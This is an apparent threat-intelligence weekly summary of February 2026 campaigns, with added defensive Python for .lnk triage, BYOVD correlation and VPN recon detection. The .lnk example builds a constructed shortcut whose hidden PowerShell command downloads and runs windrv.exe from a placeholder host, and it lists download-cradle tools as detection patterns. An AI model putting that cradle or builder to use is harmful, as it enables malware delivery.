Tags: Threat intelligence
11 February 2026

Weekly Summary Cyberattacks February 05-11

UNC1069 Targets Cryptocurrency Sector with New Tooling and AI-Enabled Social Engineering  

The financially motivated threat actor UNC1069, assessed with high confidence to have a North Korea nexus, targeted the cryptocurrency and decentralized finance (DeFi) ecosystem in a tailored intrusion against a FinTech entity. The operation combined AI-enabled social engineering with a multi-stage macOS infection chain and unusually heavy tooling on a single host, resulting in the deployment of seven distinct malware families aimed at harvesting credentials, browser data, and session artifacts that could enable cryptocurrency theft and support future social engineering. 

Phorpiex Phishing Campaign Delivers GLOBAL GROUP Ransomware  

A high-volume phishing campaign leveraging the long-running Phorpiex malware has been observed delivering the GLOBAL GROUP ransomware through weaponised Windows Shortcut (.lnk) attachments. The campaign uses phishing emails with the subject line “Your Document,” a lure that has been widely abused in large-scale operations throughout 2024 and 2025. The attachment masquerades as a legitimate Word document using a double extension (Document.doc.lnk). Because Explorer never displays the .lnk extension of a shortcut (the lnkfile type is marked NeverShowExt in the registry, independently of the default setting that hides other known extensions), the file appears as “Document.doc” even on systems where extensions are shown, and a document-style icon sourced from shell32.dll completes the disguise.

When the attachment is opened, the shortcut silently executes cmd.exe with embedded arguments, which in turn invokes PowerShell to perform a download-and-execute sequence without displaying any installer window or user prompt. PowerShell retrieves a second-stage payload over HTTP or HTTPS from a remote server and writes it to disk under a system-like filename, such as windrv.exe, typically in a user or system directory so that it blends in with legitimate Windows components. The payload is then launched via PowerShell or cmd.exe, completing the infection chain with minimal observable activity. In this campaign, Phorpiex ultimately delivers GLOBAL GROUP ransomware, a Ransomware-as-a-Service operation that emerged as a successor to the Mamona ransomware family.
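The parser and triage logic below is an added example written for this summary, not tooling from the campaign report or from any vendor. It builds two constructed .lnk files (the host stage.example.invalid, the drop path and the IDList bytes are placeholders), walks the MS-SHLLINK fixed header and StringData, and scores the indicators the paragraph describes: a document double extension, a target of cmd.exe, PowerShell with a URL and a download cradle, an .exe drop path, an icon borrowed from shell32.dll, and a hidden window. It generalizes slightly beyond the campaign by also recognizing other script hosts and common cradle cmdlets.

```python
"""Triage a Windows Shell Link (.lnk) for the cmd.exe -> PowerShell download-cradle pattern."""
import re
import struct

# LinkFlags bits (MS-SHLLINK 2.1.1) and the ShellLink CLSID as it appears on disk
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_RELATIVE_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKING_DIR, HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
SW_SHOWNORMAL, SW_SHOWMINNOACTIVE = 1, 7  # 7 ("start minimized") is commonly abused to hide the console
SHELL_HOSTS = ("cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe", "cscript.exe")
CRADLE = re.compile(r"iwr|invoke-webrequest|downloadfile|downloadstring|invoke-expression|\biex\b"
                    r"|curl|wget|bitsadmin|start-bitstransfer", re.I)


def build_lnk(rel_path, args="", icon="", show=SW_SHOWNORMAL, icon_index=0, id_list=b""):
    """Constructed-sample generator: a minimal .lnk with StringData only, plus an optional raw IDList."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | HAS_ICON_LOCATION | IS_UNICODE
    body = b""
    if id_list:  # IDListSize (uint16) followed by the ItemIDs and the 2-byte TerminalID
        flags |= HAS_LINK_TARGET_ID_LIST
        body += struct.pack("<H", len(id_list)) + id_list
    # HeaderSize, CLSID, LinkFlags, FileAttributes, 3 FILETIMEs, FileSize, IconIndex, ShowCommand,
    # HotKey, Reserved1, Reserved2, Reserved3 = 76 bytes
    header = struct.pack("<I16sIIQQQIiIHHII", 0x4C, LNK_CLSID, flags, 0, 0, 0, 0, 0,
                         icon_index, show, 0, 0, 0, 0)

    def sd(text):  # StringData item: UTF-16LE character count, then the characters (no terminator)
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")

    return header + body + sd(rel_path) + sd(args) + sd(icon)


def parse_lnk(data):
    """Validate the header, skip LinkTargetIDList/LinkInfo, and return the StringData fields."""
    if len(data) < 0x4C or struct.unpack_from("<I", data)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags, = struct.unpack_from("<I", data, 20)
    icon_index, show = struct.unpack_from("<iI", data, 56)  # IconIndex @56, ShowCommand @60
    off = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:
        off += struct.unpack_from("<I", data, off)[0]  # LinkInfoSize covers the whole structure
    info = {"icon_index": icon_index, "show_command": show}
    for key, bit in (("name", HAS_NAME), ("relative_path", HAS_RELATIVE_PATH),
                     ("working_dir", HAS_WORKING_DIR), ("arguments", HAS_ARGUMENTS),
                     ("icon_location", HAS_ICON_LOCATION)):
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, off)[0]
        off += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[off:off + count * width]
        off += count * width
        info[key] = raw.decode("utf-16-le") if width == 2 else raw.decode("cp1252", "replace")
    return info


def triage_lnk(filename, data):
    """Score the indicators the campaign relies on; each True indicator is one point."""
    info = parse_lnk(data)
    target = info.get("relative_path", "").lower()
    args = info.get("arguments", "")
    indicators = {
        "double_extension": re.search(r"\.(docx?|pdf|xlsx?|pptx?|txt)\.lnk$", filename, re.I) is not None,
        "target_is_shell": target.endswith(SHELL_HOSTS),
        "spawns_powershell": re.search(r"powershell|pwsh", args, re.I) is not None,
        "download_cradle": re.search(r"https?://", args, re.I) is not None and CRADLE.search(args) is not None,
        "executable_in_args": re.search(r"\S+\.exe\b", args, re.I) is not None,
        "icon_from_shell32": "shell32.dll" in info.get("icon_location", "").lower(),
        "window_hidden": info["show_command"] == SW_SHOWMINNOACTIVE
                         or re.search(r"-w(?:indowstyle)?\s+hidden", args, re.I) is not None,
    }
    return {"indicators": indicators, "score": sum(indicators.values()), "target": target, "arguments": args}


# Constructed samples (not real campaign artefacts): the URL, drop path and IDList bytes are placeholders.
MALICIOUS_LNK = build_lnk(
    r"..\..\..\Windows\System32\cmd.exe",
    r'/c powershell -NoP -W Hidden -c "iwr http://stage.example.invalid/p -OutFile $env:TEMP\windrv.exe;'
    r' Start-Process $env:TEMP\windrv.exe"',
    icon=r"%SystemRoot%\System32\shell32.dll", icon_index=1, show=SW_SHOWMINNOACTIVE,
    id_list=b"\x05\x00abc\x00\x00")
BENIGN_LNK = build_lnk(r"..\Documents\report.docx")

if __name__ == "__main__":
    for name, blob in (("Document.doc.lnk", MALICIOUS_LNK), ("report.lnk", BENIGN_LNK)):
        print(name, triage_lnk(name, blob))
```

Run it against mail-gateway quarantines or user Downloads folders; a score of three or more on a freshly received shortcut is worth a look, while the benign sample scores zero. Note that neither "show file extensions" nor a shortcut's icon can be trusted, which is why the check parses the target and arguments rather than the file name alone.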

New Clickfix Variant ‘CrashFix’ Deploying Python Remote Access Trojan  

Microsoft Defender Experts reported a new evolution of the ongoing ClickFix campaign, tracked as CrashFix, which combines deliberate browser-crashing behavior with social engineering to coerce victims into running malicious commands themselves. Unlike earlier ClickFix variants, CrashFix raises its execution rate by intentionally disrupting the browsing session and presenting fake remediation prompts, rather than relying on traditional exploit delivery; the resulting payload is a Python-based remote access trojan.

Black Basta: Defense Evasion Capability Embedded in Ransomware Payload  

A recent ransomware campaign linked to Black Basta revealed an unusual evolution in defense-evasion tradecraft, with a bring-your-own-vulnerable-driver (BYOVD) capability embedded directly inside the ransomware payload itself rather than delivered as a separate pre-encryption tool. In this activity, the ransomware dropped and attempted to load a vulnerable Windows kernel-mode driver, NSecKrnl, developed by NsecSoft, which was then exploited to terminate security-related processes before encryption occurred. This approach differs from the more common ransomware playbook, where a standalone defense-evasion tool is deployed ahead of the ransomware stage, and represents the first known instance of such bundling observed in Black Basta operations. 
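The correlation logic below is an added example, not detection content from the report or from any vendor. It replays constructed Sysmon-style events (Event ID 11 FileCreate, Event ID 6 DriverLoad, Event ID 5 ProcessTerminate) and raises an alert when a driver that was just dropped, sits in a user-writable path, or is on a watchlist is loaded and security-product processes die shortly afterwards. The file name nseckrnl.sys, the security-process list and the 120-second window are assumptions; the report names the driver only as NSecKrnl and gives no hash.

```python
"""Correlate Sysmon driver-load events with subsequent security-process terminations (BYOVD kill)."""
from datetime import datetime, timedelta

# Assumed watchlists, not taken from the report. "nseckrnl.sys" is an assumed on-disk name for the
# NSecKrnl driver; in practice extend this set from a maintained list such as loldrivers.io.
WATCHLIST_DRIVERS = {"nseckrnl.sys"}
SECURITY_PROCESSES = {"msmpeng.exe", "mssense.exe", "sensecncproxy.exe", "csfalconservice.exe",
                      "sentinelagent.exe", "cb.exe", "elastic-endpoint.exe"}
USER_WRITABLE = ("\\users\\", "\\programdata\\", "\\temp\\")


def _ts(e):
    return datetime.strptime(e["UtcTime"], "%Y-%m-%d %H:%M:%S.%f")


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect_byovd_kill(events, window_s=120):
    """One alert per suspicious driver load (EID 6) followed within window_s by EID 5 terminations
    of security-product processes. Sysmon EID 5 does not record who ended the process, so the
    sequence driver-load -> agent death is the signal, not any single event."""
    events = sorted(events, key=_ts)
    dropped = {}  # lower-cased .sys path -> image that wrote it (EID 11)
    alerts = []
    for i, e in enumerate(events):
        if e["EventID"] == 11 and e["TargetFilename"].lower().endswith(".sys"):
            dropped[e["TargetFilename"].lower()] = e["Image"]
            continue
        if e["EventID"] != 6:
            continue
        path = e["ImageLoaded"].lower()
        reasons = []
        if _basename(path) in WATCHLIST_DRIVERS:
            reasons.append("driver on BYOVD watchlist")
        if path in dropped:
            reasons.append(f"driver written by {_basename(dropped[path])} before load")
        if any(seg in path for seg in USER_WRITABLE):
            reasons.append("driver loaded from a user-writable path")
        if not reasons:
            continue
        t0 = _ts(e)
        killed = [_basename(x["Image"]) for x in events[i + 1:]
                  if x["EventID"] == 5 and _ts(x) - t0 <= timedelta(seconds=window_s)
                  and _basename(x["Image"]) in SECURITY_PROCESSES]
        if killed:
            alerts.append({"time": e["UtcTime"], "driver": path, "reasons": reasons,
                           "killed": killed, "severity": "high" if len(killed) > 1 else "medium"})
    return alerts


# Constructed event stream (field names follow Sysmon's schema; values are invented for the example).
CONSTRUCTED_EVENTS = [
    {"EventID": 11, "UtcTime": "2026-02-06 10:20:05.000",
     "Image": r"C:\Users\victim\Downloads\payload.exe", "TargetFilename": r"C:\ProgramData\nseckrnl.sys"},
    {"EventID": 6, "UtcTime": "2026-02-06 10:20:06.500",
     "ImageLoaded": r"C:\ProgramData\nseckrnl.sys", "Signed": "true", "SignatureStatus": "Valid"},
    {"EventID": 5, "UtcTime": "2026-02-06 10:20:07.000",
     "Image": r"C:\Program Files\Windows Defender\MsMpEng.exe", "ProcessId": 3188},
    {"EventID": 5, "UtcTime": "2026-02-06 10:20:07.200",
     "Image": r"C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe", "ProcessId": 5540},
    # benign: an inbox driver loads from System32 and an unrelated process exits later
    {"EventID": 6, "UtcTime": "2026-02-06 11:00:00.000",
     "ImageLoaded": r"C:\Windows\System32\drivers\usbprint.sys", "Signed": "true", "SignatureStatus": "Valid"},
    {"EventID": 5, "UtcTime": "2026-02-06 11:00:30.000",
     "Image": r"C:\Windows\System32\notepad.exe", "ProcessId": 9001},
]

if __name__ == "__main__":
    for a in detect_byovd_kill(CONSTRUCTED_EVENTS):
        print(a)
```

Because the driver is validly signed, signature status alone will not flag it; the write-then-load sequence from a user-writable location and the agent terminations that follow are what distinguish this from a legitimate driver installation. Blocking the driver's hash through the Microsoft vulnerable driver blocklist or a WDAC policy is the preventive counterpart once the sample is in hand.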

EDR Killer Tool Uses Signed Kernel Driver From Forensic Software  

Researchers detected an intrusion in which threat actors used compromised SonicWall SSLVPN credentials to gain initial access to a victim network and then attempted to disable endpoint security with a kernel-level EDR killer. After authenticating to the VPN from malicious external IP addresses, the attackers conducted aggressive internal reconnaissance, including ICMP ping sweeps, NetBIOS name service probing, and SMB-focused activity that exhibited SYN flood behavior exceeding 370 SYN packets per second. During the intrusion they deployed a 64-bit Windows executable masquerading as a legitimate firmware update utility that functioned as an EDR killer, loading a signed kernel driver originally shipped with forensic software to gain the kernel access needed to blind the endpoint agent.
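The detector below is an added example for this summary, not the vendor's detection content. It replays a constructed packet summary from a VPN-assigned address (the 10.8.0.0/24 pool and 10.1.0.0/24 targets are invented) and raises one alert per source and technique: an ICMP echo sweep, NetBIOS name-service probing on UDP/137, an SMB host sweep on TCP/445, and a SYN-only rate over the report's 370 SYN/s figure. The sweep threshold of 16 distinct hosts per second and the one-second window are assumptions.

```python
"""Sliding-window detection of the VPN-borne reconnaissance pattern: ping sweep, NBNS probing, SMB SYN flood."""
from collections import defaultdict, deque
from dataclasses import dataclass


@dataclass(frozen=True)
class Pkt:
    ts: float        # seconds since capture start
    src: str
    dst: str
    proto: str       # "tcp" | "udp" | "icmp"
    dport: int       # 0 for icmp
    flags: str       # TCP flags such as "S", "SA", "A"; "" for non-TCP
    icmp_type: int = -1  # 8 = echo request


def detect_recon(packets, syn_rate=370, window=1.0, sweep_hosts=16):
    """Return alerts (one per src and kind). syn_rate follows the report; the rest are assumed."""
    packets = sorted(packets, key=lambda p: p.ts)
    syns = defaultdict(deque)  # src -> timestamps of SYN-only segments inside the window
    sweeps = {k: defaultdict(dict) for k in ("icmp_sweep", "nbns_probe", "smb_sweep")}  # src -> {dst: ts}
    alerts, fired = [], set()

    def fire(src, kind, detail):
        if (src, kind) not in fired:
            fired.add((src, kind))
            alerts.append({"src": src, "kind": kind, "detail": detail})

    def note_target(kind, p):
        seen = sweeps[kind][p.src]
        seen[p.dst] = p.ts
        for d in [d for d, t in seen.items() if t < p.ts - window]:
            del seen[d]
        if len(seen) >= sweep_hosts:
            fire(p.src, kind, f"{len(seen)} distinct hosts within {window:g}s")

    for p in packets:
        if p.proto == "icmp" and p.icmp_type == 8:
            note_target("icmp_sweep", p)
        elif p.proto == "udp" and p.dport == 137:
            note_target("nbns_probe", p)
        elif p.proto == "tcp" and p.flags == "S":
            q = syns[p.src]
            q.append(p.ts)
            while q[0] < p.ts - window:
                q.popleft()
            if len(q) / window > syn_rate:
                fire(p.src, "syn_flood", f"{len(q) / window:.0f} SYN/s")
            if p.dport == 445:
                note_target("smb_sweep", p)
    return alerts


def constructed_capture():
    """Constructed traffic: one VPN client scanning, one VPN client doing normal file-server access."""
    attacker, benign = "10.8.0.23", "10.8.0.40"
    pkts = []
    # ICMP echo requests to 30 hosts within 0.3 s
    pkts += [Pkt(0.01 * i, attacker, f"10.1.0.{i}", "icmp", 0, "", 8) for i in range(1, 31)]
    # NetBIOS name-service probes to 20 hosts
    pkts += [Pkt(0.5 + 0.01 * i, attacker, f"10.1.0.{i}", "udp", 137, "") for i in range(1, 21)]
    # 400 SYN-only segments to TCP/445 across 40 hosts within ~0.8 s
    pkts += [Pkt(1.0 + 0.002 * i, attacker, f"10.1.0.{1 + i % 40}", "tcp", 445, "S") for i in range(400)]
    # Benign: five SMB handshakes to one file server spread over five seconds
    for i in range(5):
        pkts += [Pkt(1.0 + i, benign, "10.1.0.10", "tcp", 445, "S"),
                 Pkt(1.01 + i, "10.1.0.10", benign, "tcp", 52000 + i, "SA"),
                 Pkt(1.02 + i, benign, "10.1.0.10", "tcp", 445, "A")]
    return pkts


if __name__ == "__main__":
    for a in detect_recon(constructed_capture()):
        print(a)
```

Feed it flow or packet summaries from the VPN concentrator's inside interface; a freshly authenticated VPN client that trips several of these kinds within minutes of login is the picture the report describes, and the VPN session's source IP and username give the pivot back to the compromised credential.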